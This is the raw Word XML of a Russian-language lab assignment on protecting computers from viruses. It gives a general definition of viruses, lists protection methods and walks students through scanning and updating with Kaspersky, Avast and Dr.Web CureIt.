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4AF2B" w14:textId="6E9E4D5B" w:rsidR="00F308D2" w:rsidRPr="003D0C54" w:rsidRDefault="00F308D2" w:rsidP="00F30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08D2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№ </w:t>
      </w:r>
      <w:r w:rsidR="003D0C54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7080C522" w14:textId="7B00A810" w:rsidR="00F308D2" w:rsidRDefault="00F308D2" w:rsidP="00F30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8D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«Средства защиты компьютера от вирусов. Работа с антивирусными пакетами»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633C731C" w14:textId="77777777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39DC158" w14:textId="53000C1D" w:rsid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F308D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ознакомиться с теоретическими аспектами защиты информации от вредоносных программ: разновидностями вирусов, способами заражения и методы борьбы. Ознакомиться с различными видами программных средств защиты от вирусов. Проверка настроек антивирусов, сканирование файлов, папок и дисков, обновления антивирусной базы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08D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Получить навыки работы с антивирусным пакетом Антивирус Касперского.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35171EA9" w14:textId="77777777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F277B" w14:textId="77777777" w:rsidR="00F308D2" w:rsidRPr="00F308D2" w:rsidRDefault="00F308D2" w:rsidP="00F30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8D2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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB363A2" w14:textId="05613029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AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Компьютерный вирус</w:t>
      </w:r>
      <w:r w:rsidRPr="00F308D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - это специально написанная небольшая по размерам программа,</w:t>
      </w:r>
      <w:r w:rsidR="00551AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F308D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>которая может "приписывать" себя к другим программам (т.е. "заражать" их), а также выполнять различные нежелательные действия на компьютере. Программа, внутри которой находится вирус, называется "зараженной". Когда такая программа начинает работу, то сначала управление получает вирус. Вирус находит и "заражает" другие программы, а также выполняет какие-нибудь вредные действия (например, портит файлы или FAT-таблицу, "засоряет" оперативную память и т.д.). Для маскировки вируса действия по заражению других программ и нанесению вреда могут выполняться не всегда, а при выполнении определенных условий. После того как вирус выполнит нужные ему</w:t>
      </w:r>
      <w:r w:rsidR="00551AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F308D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>действия, он передает управление той программе, в которой он находится, и она работает также, как обычно. Тем самым внешне работа зараженной программы выглядит так же, как и незараженной.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BBF5A1" w14:textId="747DE6A5" w:rsid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Компьютерный вирус может испортить, т.е. изменить ненадлежащим образом, любой файл на имеющихся в компьютере дисках. Но некоторые виды файлов вирус может "заразить". Это означает, что вирус может "внедриться" в эти файлы, т.е. изменить их так, что они будут содержать вирус, который при некоторых обстоятельствах может начать свою работу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EE5A6E" w14:textId="77777777" w:rsidR="00551AF1" w:rsidRPr="00F308D2" w:rsidRDefault="00551AF1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B02BF" w14:textId="77777777" w:rsidR="00F308D2" w:rsidRPr="00551AF1" w:rsidRDefault="00F308D2" w:rsidP="00551A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AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Методы защиты от компьютерных вирусов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A7D900" w14:textId="01DAF248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Каким бы не был вирус, пользователю необходимо знать основные методы защиты от компьютерных вирусов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093CC851" w14:textId="77777777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Для защиты от вирусов можно использовать:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCA8CC7" w14:textId="0A3FB621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• общие средства защиты информации, которые полезны также и как страховка от физической порчи дисков, неправильно работающих программ или ошибочных действий пользователя;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73131D55" w14:textId="493ACD48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• профилактические меры, позволяющие уменьшить вероятность заражения вирусом;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F592CD5" w14:textId="77777777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• специализированные программы для защиты от вирусов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A96EF4" w14:textId="6FE20CF5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Общие средства защиты информации полезны не только для защиты от вирусов. Имеются две основные разновидности этих средств:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16124176" w14:textId="77777777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• копирование информации - создание копий файлов и системных областей дисков;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E0820F" w14:textId="6E848AEA" w:rsidR="00F308D2" w:rsidRPr="00F308D2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>• разграничение доступа предотвращает несанкционированное использование информации, в частности, защиту от изменений программ и данных вирусами, неправильно</w:t>
      </w:r>
      <w:r w:rsidR="009C5B0E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F308D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>работающими программами и ошибочными действиями пользователей.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7108A9CF" w14:textId="39381347" w:rsidR="00D77278" w:rsidRDefault="00F308D2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8D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Несмотря на то, что общие средства защиты информации очень важны для защиты от вирусов, все же их недостаточно. Необходимо и применение специализированных программ для защиты от вирусов. Эти программы можно разделить на несколько видов: </w:t>
      </w:r>
      <w:r w:rsidR="009C5B0E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>д</w:t>
      </w:r>
      <w:r w:rsidRPr="00F308D2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>етекторы, доктора (фаги), ревизоры, доктора-ревизоры, фильтры и вакцины (иммунизаторы).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E92BCC" w14:textId="4341E6D5" w:rsidR="009C5B0E" w:rsidRDefault="009C5B0E" w:rsidP="00F30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D1933" w14:textId="77777777" w:rsidR="00D55609" w:rsidRDefault="00D55609" w:rsidP="004F21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AD79D" w14:textId="77777777" w:rsidR="00D55609" w:rsidRDefault="00D55609" w:rsidP="004F21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23EA6" w14:textId="77777777" w:rsidR="00D55609" w:rsidRDefault="00D55609" w:rsidP="004F21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3A564" w14:textId="77777777" w:rsidR="00D55609" w:rsidRDefault="00D55609" w:rsidP="004F21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15C49" w14:textId="7D8C0C36" w:rsidR="009C5B0E" w:rsidRDefault="009C5B0E" w:rsidP="004F21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B0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</w:p>
    <w:p w14:paraId="68016388" w14:textId="773257A9" w:rsidR="00843EB8" w:rsidRPr="00843EB8" w:rsidRDefault="00C85EB1" w:rsidP="00843EB8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C85EB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Подготовить доклад на тему: «Общие сведения и особенности работы антивирусной программы [</w:t>
      </w:r>
      <w:r w:rsidRPr="00221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Название антивирусной программы</w:t>
      </w:r>
      <w:r w:rsidRPr="00C85EB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]» (</w:t>
      </w:r>
      <w:r w:rsidRPr="00221C77">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Название антивирусной программы выбрать согласно своему варианту из </w:t>
      </w:r>
      <w:r w:rsidRPr="00221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Вариантов заданий к работе</w:t>
      </w:r>
      <w:r w:rsidRPr="00C85EB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="00843EB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Теоретический материал оформить с помощью инфографики, выполненной в одной из программ </w:t>
      </w:r>
      <w:r w:rsidR="00843E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Joyteka</w:t>
      </w:r>
      <w:r w:rsidR="00843EB8" w:rsidRPr="00843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43E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="00843EB8" w:rsidRPr="00843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="00843E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Visme</w:t>
      </w:r>
      <w:r w:rsidR="00843EB8" w:rsidRPr="00843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43E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</w:t>
      </w:r>
      <w:r w:rsidR="00843EB8" w:rsidRPr="00843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="00843E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Piktochart</w:t>
      </w:r>
      <w:r w:rsidR="00843EB8" w:rsidRPr="00843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43E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="00843EB8" w:rsidRPr="00843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43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Вынести в отчёт по лабораторной работе скрин результата.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AAB2F0" w14:textId="0D9F8D8A" w:rsidR="004D0A42" w:rsidRPr="00843EB8" w:rsidRDefault="004D0A42" w:rsidP="00C85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58D6C" w14:textId="543A6481" w:rsidR="004D0A42" w:rsidRDefault="004D0A42" w:rsidP="004D0A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A4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94761FE" w14:textId="29CB693C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 xml:space="preserve">Изучить антивирусный пакет </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0A42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Антивирус Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0A42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Подготовить отчет по лабораторной работе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22873F3E" w14:textId="5C55E847" w:rsidR="004D0A42" w:rsidRPr="004D0A42" w:rsidRDefault="004D0A42" w:rsidP="004D0A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A42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Порядок выполнения</w:t>
      </w:r>
      <w:r w:rsidR="00E004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91EB91" w14:textId="7B90F118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 xml:space="preserve">1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6A37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сканирование папок на наличие вирусов</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0A42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58438875" w14:textId="0876ACF4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>– Двойным щелчком на значке антивируса на панели индикации открыть главное окно программы;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188A9EBB" w14:textId="4BD5C49D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>– Изучить содержимое окна: обратить внимание на дату последнего обновления антивирусной базы и дату последней полной проверки компьютера;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF8E090" w14:textId="74615BDE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 xml:space="preserve">– В своей личной папке создать папку </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6A37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Подозрительные файлы</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0A42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и создать там 2 файла: Текстовый файл и Документ Microsoft Word. Имена файлов ввести согласно своему варианту по Вариантам задания к работе;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1300DC40" w14:textId="560E385A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 xml:space="preserve">– Выбрав пункт в главном окне программы пункт Проверка – Быстрая проверка и добавить в окно заданий папку </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6A37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Подозрительные файлы</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0A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3FAEF" w14:textId="503E3498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>– Выполнить проверку папки. По завершению сканирования, используя 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A42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">«Отчеты» - «Сохранить как…», сохранить отчет с результатами проверки в папке Подозрительные файлы. Имя файла-отчета – </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6A37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Scan_Log</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0A42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6E9624" w14:textId="67D2438F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A37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Обновление антивирусной базы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F8932D" w14:textId="0997896F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>– Нажмите на пункт Обновление и, используя кнопку Обновить, осуществите обновление базы известных вирусов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408E84F2" w14:textId="0D563921" w:rsidR="004D0A42" w:rsidRP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>– По завершению обновления, используя кнопку «Отчеты» - «Сохранить как…»,, сохранить отчет об обновлении в папке Подозрительные файлы. Имя файла</w:t>
      </w:r>
      <w:r w:rsidR="00AD6A37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004D0A42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">отчета – </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD6A37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Upd_Log</w:t>
      </w:r>
      <w:r w:rsidRPr="004D0A42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2E9CED" w14:textId="427FD04C" w:rsidR="004D0A42" w:rsidRDefault="004D0A42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42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>– Закройте окно Антивируса Касперского.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C66CE0C" w14:textId="4EFB856A" w:rsidR="00751DC8" w:rsidRDefault="00751DC8" w:rsidP="004D0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E9CEE" w14:textId="71319DE1" w:rsidR="00751DC8" w:rsidRPr="00AD6A37" w:rsidRDefault="00751DC8" w:rsidP="00AD6A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6A37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15E73240" w14:textId="77777777" w:rsidR="00751DC8" w:rsidRPr="003D0C54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Изучить антивирусный пакет </w:t>
      </w:r>
      <w:r w:rsidRPr="00E0042C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Avast</w:t>
      </w:r>
      <w:r w:rsidRPr="00751DC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617F8848" w14:textId="6521CA2C" w:rsidR="00751DC8" w:rsidRPr="00E0042C" w:rsidRDefault="00751DC8" w:rsidP="00E004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42C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Порядок выполнения</w:t>
      </w:r>
      <w:r w:rsidR="00E004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A47A61" w14:textId="21DA3CAD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1. Найдите иконку антивируса Avast! В системном трее, правой кнопкой мышки вызовите меню и выберите «Открыть интерфейс пользователя Avast!»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774EA78F" w14:textId="2CDC62ED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2. Перейдите на вкладку «Сканировать компьютер». Вам будет представлены 4 вида сканирования: Экспресс, Полное, Сканирование носителей и возможность выбрать папку для сканирования вручную.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDCEC72" w14:textId="32E85B66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3. Выберите «Сканирование съемных носителей» и нажмите кнопку «Пуск» в окне антивируса – будут автоматически проверены все подключенные к компьютеру съемные носители (диски, флэшки, дискеты).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279FD194" w14:textId="1707203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4. По завершении сканирования выберите четвертый вид сканирования и вручную укажите любую папку на вашем съемном носителе и проверьте её.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF909AF" w14:textId="44422C7A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5. Во вкладке «Экраны в реальном времени», в подменю «Экран файловой системы» нажав кнопку «Расширенные настройки» вы можете разрешить/запретить антивирусу следующие действия:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDB33E2" w14:textId="5D20A292" w:rsidR="00751DC8" w:rsidRPr="00751DC8" w:rsidRDefault="00751DC8" w:rsidP="00A148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Сканировать программы при выполнении (например, программа excel.exe</w:t>
      </w:r>
      <w:r w:rsidR="00A14805">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00751DC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>будет сканироваться при каждом выполнении Microsoft Excel)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D91DCF4" w14:textId="62F98656" w:rsidR="00751DC8" w:rsidRPr="00751DC8" w:rsidRDefault="00751DC8" w:rsidP="00A148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Сканировать сценарии при выполнении (например, файл JS (JavaScript) будет сканироваться при каждом его выполнении)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD66ADD" w14:textId="77777777" w:rsidR="00751DC8" w:rsidRPr="00751DC8" w:rsidRDefault="00751DC8" w:rsidP="00A148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lastRenderedPageBreak/>
        <w:t xml:space="preserve">• Сканировать библиотеки (DLL) при загрузке (при выполнении программы </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCE5B41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будут сканироваться её вспомогательные файлы – библиотеки DLL и т.д.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2D8AAF" w14:textId="3138294C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6. Во вкладке «Экраны в реальном времени», в подменю «Веб-экран» нажав кнопку «Расширенные настройки» вы можете разрешить/запретить антивирусу следующие действия:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642E46CB" w14:textId="77777777" w:rsidR="00751DC8" w:rsidRPr="00751DC8" w:rsidRDefault="00751DC8" w:rsidP="00A148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Включить веб-сканирование</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5ED740" w14:textId="77777777" w:rsidR="00751DC8" w:rsidRPr="00751DC8" w:rsidRDefault="00751DC8" w:rsidP="00A148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Использовать интеллектуальное сканирование потока</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B999AB" w14:textId="3698F241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7. Во вкладке «Обслуживание» в подменю «Обновить» есть возможность ручного запуска обновлений для «Модуля сканирования и определения вирусов» и непосредственно для программы. (По умолчанию модуль обновляется автоматически, а обновление программы запрашивает разрешения пользователя).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CC0B9F" w14:textId="21E7C30D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8. По завершению сканирования, используя кнопку «</w:t>
      </w:r>
      <w:r w:rsidRPr="00452D91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчеты» - «Сохранить как…</w:t>
      </w:r>
      <w:r w:rsidRPr="00751DC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>», сохранить отчет с результатами проверки</w:t>
      </w:r>
      <w:r w:rsidR="00A14805">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C03646" w14:textId="77777777" w:rsidR="00A14805" w:rsidRPr="00A14805" w:rsidRDefault="00A14805" w:rsidP="00751D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691A1" w14:textId="0FEF0B60" w:rsidR="00751DC8" w:rsidRPr="00A14805" w:rsidRDefault="00751DC8" w:rsidP="00A148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805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5D6D902C" w14:textId="1F33798D" w:rsid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Изучить антивирусный пакет </w:t>
      </w:r>
      <w:r w:rsidRPr="00452D91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dr. Web CureIt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CADB62" w14:textId="5DA17E49" w:rsidR="00452D91" w:rsidRPr="00452D91" w:rsidRDefault="00452D91" w:rsidP="00452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2D91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Порядок выполнения:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332A5196" w14:textId="3BE2FBB4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1. При запуске этого портативного антивируса вам будет предложено запустить его в режиме усиленной защиты – он необходим в случае, если вредоносные программы блокируют работу операционной системы. Нажмите «Отмена».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6ACBAF" w14:textId="0DDF0A1A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2. Далее появится предупреждение, т.к. использование антивируса бесплатно доступно только для лечения домашних компьютеров. Нажмите «Нет».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA8F9ED" w14:textId="47600B14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3. Нажмите «Пуск» и будет автоматически запущены быстрая проверка компьютера.</w:t>
      </w:r>
      <w:r w:rsidR="00222B7F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00751DC8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В этом режиме проверяются:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1388EA9E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Оперативная память</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069D69FF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Загрузочные секторы всех дисков</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF810C2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Объекты автозапуска</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA7DA5D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• Корневой каталог загрузочного диска </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2470ED3D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• Корневой каталог диска установки Windows </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4A13A1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Системный каталог Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DFD27F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Папка Мои Документы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9AFECB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Временный каталог системы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212D957A" w14:textId="77777777" w:rsidR="00751DC8" w:rsidRPr="00751DC8" w:rsidRDefault="00751DC8" w:rsidP="00452D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• Временный каталог пользователя</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DD7D36" w14:textId="60940039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4. По окончании быстрой проверки выбрать в меню пункт «Выборочно» и указать путь к съемному носителю – выполнить его проверку.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425E8AD0" w14:textId="7A455166" w:rsid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5. По завершению сканирования, используя кнопку «Отчеты» - «Сохранить как…», сохранить отчет с результатами проверки</w:t>
